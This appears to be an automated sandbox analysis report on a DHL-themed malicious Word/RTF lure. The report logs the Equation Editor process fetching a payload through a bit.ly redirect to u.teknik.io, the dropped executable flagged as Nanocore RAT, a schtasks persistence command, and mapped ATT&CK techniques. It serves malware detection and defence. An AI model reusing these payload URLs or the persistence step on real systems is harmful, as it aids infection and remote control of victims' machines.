SHA512:	44b051486e927067deba3842d423b120c4186fc3512804fb015e1f71a6dda7b5cfd56b3741578e8fee32565f147270103f415379ee146bc7fb33f8dd360dc784
SSDEEP:	12288:GC+C+C+C+C+C+C+C+C+C+C+C+C+C+C+C+C+C+C+C+C+C+C+C+CmEl5D:l999999999999999999999999zl5D
File Content Preview:	{\rtf51437\page11419927264400464@ApJnbSmEIkBYwPBr@-DysivyjzZmoIeCPiF<eh&&0_M-C_g--_-d,64>32997$Cv>yt=n5\|:%_>jn8%bm\mklP;=u\m3699.28.... .... ...... .... .... ....

File Icon


Icon Hash:	e4eea2aaa4b4b4a4

Static RTF Info

Objects

Id	Start	Format ID	Format	Classname	Datasize	Filename	Sourcepath	Temppath	Exploit
0	00140183h								no

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 24, 2021 12:53:25.777452946 CET	49165	80	192.168.2.22	67.199.248.11
Feb 24, 2021 12:53:25.791138887 CET	80	49165	67.199.248.11	192.168.2.22
Feb 24, 2021 12:53:25.791285992 CET	49165	80	192.168.2.22	67.199.248.11
Feb 24, 2021 12:53:25.791449070 CET	49165	80	192.168.2.22	67.199.248.11
Feb 24, 2021 12:53:25.810259104 CET	80	49165	67.199.248.11	192.168.2.22
Feb 24, 2021 12:53:25.911385059 CET	80	49165	67.199.248.11	192.168.2.22
Feb 24, 2021 12:53:25.911494970 CET	49165	80	192.168.2.22	67.199.248.11
Feb 24, 2021 12:53:26.106566906 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:26.141967058 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:26.142040968 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:26.151026964 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:26.186956882 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:26.187015057 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:26.187037945 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:26.187102079 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:26.196530104 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:26.232887983 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:26.233068943 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.610579014 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.697401047 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.850507021 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.850605965 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.850625992 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.850989103 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.851203918 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.851227045 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.851248980 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.851280928 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.851291895 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.851300001 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.851325989 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.851360083 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.851753950 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.851789951 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.851810932 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.851828098 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.851902008 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.851994991 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.852257013 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.852294922 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.852317095 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.852327108 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.852334976 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.852370024 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.852396965 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.879446030 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.885755062 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.885781050 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.885853052 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.885941982 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.885978937 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.885998011 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.886009932 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.886027098 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.886033058 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.886054039 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.886058092 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.886082888 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.886117935 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.886284113 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.886346102 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.886348009 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.886373043 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.886394978 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.886404991 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.886425018 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.886764050 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.886812925 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.886862040 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.886897087 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.886907101 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.886923075 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.886943102 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.886960983 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.887275934 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.887309074 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.887335062 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.887351036 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.887717962 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.887770891 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.887799025 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.887836933 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.887845993 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.887868881 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.887891054 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.887892008 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.887909889 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.887938976 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.887953997 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.888003111 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.903764963 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.920838118 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.920886040 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.920909882 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.920939922 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.920943022 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.920955896 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.920964956 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 12:53:27.920979023 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 12:53:27.920986891 CET	443	49166	5.79.72.163	192.168.2.22

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 24, 2021 12:53:25.749974966 CET	52197	53	192.168.2.22	8.8.8.8
Feb 24, 2021 12:53:25.763849020 CET	53	52197	8.8.8.8	192.168.2.22
Feb 24, 2021 12:53:25.968547106 CET	53099	53	192.168.2.22	8.8.8.8
Feb 24, 2021 12:53:26.105269909 CET	53	53099	8.8.8.8	192.168.2.22
Feb 24, 2021 12:53:26.551832914 CET	52838	53	192.168.2.22	8.8.8.8
Feb 24, 2021 12:53:26.564204931 CET	53	52838	8.8.8.8	192.168.2.22
Feb 24, 2021 12:53:26.564425945 CET	52838	53	192.168.2.22	8.8.8.8
Feb 24, 2021 12:53:26.578783035 CET	53	52838	8.8.8.8	192.168.2.22
Feb 24, 2021 12:53:26.591342926 CET	61200	53	192.168.2.22	8.8.8.8
Feb 24, 2021 12:53:26.605803013 CET	53	61200	8.8.8.8	192.168.2.22
Feb 24, 2021 12:53:27.098644972 CET	49548	53	192.168.2.22	8.8.8.8
Feb 24, 2021 12:53:27.116538048 CET	53	49548	8.8.8.8	192.168.2.22
Feb 24, 2021 12:53:27.120400906 CET	55627	53	192.168.2.22	8.8.8.8
Feb 24, 2021 12:53:27.132972002 CET	53	55627	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Feb 24, 2021 12:53:25.749974966 CET	192.168.2.22	8.8.8.8	0xc229	Standard query (0)	bit.ly	A (IP address)	IN (0x0001)
Feb 24, 2021 12:53:25.968547106 CET	192.168.2.22	8.8.8.8	0xbdfc	Standard query (0)	u.teknik.io	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Feb 24, 2021 12:53:25.763849020 CET	8.8.8.8	192.168.2.22	0xc229	No error (0)	bit.ly		67.199.248.11	A (IP address)	IN (0x0001)
Feb 24, 2021 12:53:25.763849020 CET	8.8.8.8	192.168.2.22	0xc229	No error (0)	bit.ly		67.199.248.10	A (IP address)	IN (0x0001)
Feb 24, 2021 12:53:26.105269909 CET	8.8.8.8	192.168.2.22	0xbdfc	No error (0)	u.teknik.io	teknik.io		CNAME (Canonical name)	IN (0x0001)
Feb 24, 2021 12:53:26.105269909 CET	8.8.8.8	192.168.2.22	0xbdfc	No error (0)	teknik.io		5.79.72.163	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

bit.ly

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49165	67.199.248.11	80	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp	kBytes transferred	Direction	Data
Feb 24, 2021 12:53:25.791449070 CET	0	OUT	GET /3kijui1 HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: bit.ly Connection: Keep-Alive
Feb 24, 2021 12:53:25.911385059 CET	1	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Wed, 24 Feb 2021 11:53:25 GMT Content-Type: text/html; charset=utf-8 Content-Length: 116 Cache-Control: private, max-age=90 Location: https://u.teknik.io/HOMqO.txt Set-Cookie: _bit=l1obRp-93e7878892ed3a82aa-00m; Domain=bit.ly; Expires=Mon, 23 Aug 2021 11:53:25 GMT Via: 1.1 google Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 42 69 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 75 2e 74 65 6b 6e 69 6b 2e 69 6f 2f 48 4f 4d 71 4f 2e 74 78 74 22 3e 6d 6f 76 65 64 20 68 65 72 65 3c 2f 61 3e 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>Bitly</title></head><body><a href="https://u.teknik.io/HOMqO.txt">moved here</a></body></html>

Code Manipulations

Statistics

Behavior

Click to jump to process

System Behavior

Analysis Process: WINWORD.EXE PID: 2264 Parent PID: 584

General

Start time:	12:53:31
Start date:	24/02/2021
Path:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Imagebase:	0x13f830000
File size:	1424032 bytes
MD5 hash:	95C38D04597050285A18F66039EDB456
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: EQNEDT32.EXE PID: 1324 Parent PID: 584

General

Start time:	12:53:35
Start date:	24/02/2021
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Imagebase:	0x400000
File size:	543304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: 69577.exe PID: 2320 Parent PID: 1324

General

Start time:	12:53:38
Start date:	24/02/2021
Path:	C:\Users\Public\69577.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\Public\69577.exe
Imagebase:	0x3e0000
File size:	766976 bytes
MD5 hash:	8C596990203F7D15651498FDBA84B5F3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000002.2117450780.0000000003259000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000002.2117450780.0000000003259000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000004.00000002.2117450780.0000000003259000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Reputation:	low

Analysis Process: schtasks.exe PID: 824 Parent PID: 2320

General

Start time:	12:53:51
Start date:	24/02/2021
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\xWdTBYiTWyTud' /XML 'C:\Users\user\AppData\Local\Temp\tmpA738.tmp'
Imagebase:	0xa20000
File size:	179712 bytes
MD5 hash:	2003E9B15E1C502B146DAD2E383AC1E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: 69577.exe PID: 2900 Parent PID: 2320

General

Start time:	12:53:52
Start date:	24/02/2021
Path:	C:\Users\Public\69577.exe
Wow64 process (32bit):	false
Commandline:	{path}
Imagebase:	0x3e0000
File size:	766976 bytes
MD5 hash:	8C596990203F7D15651498FDBA84B5F3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Analysis Process: 69577.exe PID: 2500 Parent PID: 2320

General

Start time:	12:53:52
Start date:	24/02/2021
Path:	C:\Users\Public\69577.exe
Wow64 process (32bit):	false
Commandline:	{path}
Imagebase:	0x3e0000
File size:	766976 bytes
MD5 hash:	8C596990203F7D15651498FDBA84B5F3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Analysis Process: 69577.exe PID: 2480 Parent PID: 2320

General

Start time:	12:53:53
Start date:	24/02/2021
Path:	C:\Users\Public\69577.exe
Wow64 process (32bit):	false
Commandline:	{path}
Imagebase:	0x3e0000
File size:	766976 bytes
MD5 hash:	8C596990203F7D15651498FDBA84B5F3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Analysis Process: 69577.exe PID: 2468 Parent PID: 2320

General

Start time:	12:53:53
Start date:	24/02/2021
Path:	C:\Users\Public\69577.exe
Wow64 process (32bit):	false
Commandline:	{path}
Imagebase:	0x3e0000
File size:	766976 bytes
MD5 hash:	8C596990203F7D15651498FDBA84B5F3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Analysis Process: 69577.exe PID: 2464 Parent PID: 2320

General

Start time:	12:53:53
Start date:	24/02/2021
Path:	C:\Users\Public\69577.exe
Wow64 process (32bit):	false
Commandline:	{path}
Imagebase:	0x3e0000
File size:	766976 bytes
MD5 hash:	8C596990203F7D15651498FDBA84B5F3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Disassembly

Code Analysis

Reset < >

Description:	Adversaries may send spearphishing emails with a malicious link in an attempt to elicit sensitive information and/or gain access to victim systems. Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attaching malicious files to the email itself, to avoid defenses that may inspect email attachments.
Tactics:	Initial Access
Data Sources:	DNS records, Detonation chamber, Email gateway, Mail server, Packet capture, SSL/TLS inspection, Web proxy
Platforms:	Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries.
Tactics:	Command and Control
Data Sources:	Network intrusion detection system, Network protocol analysis, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909yy.doc

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Exploits:

Compliance:

Software Vulnerabilities:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static RTF Info

Objects

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

Code Manipulations

Statistics

Behavior

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre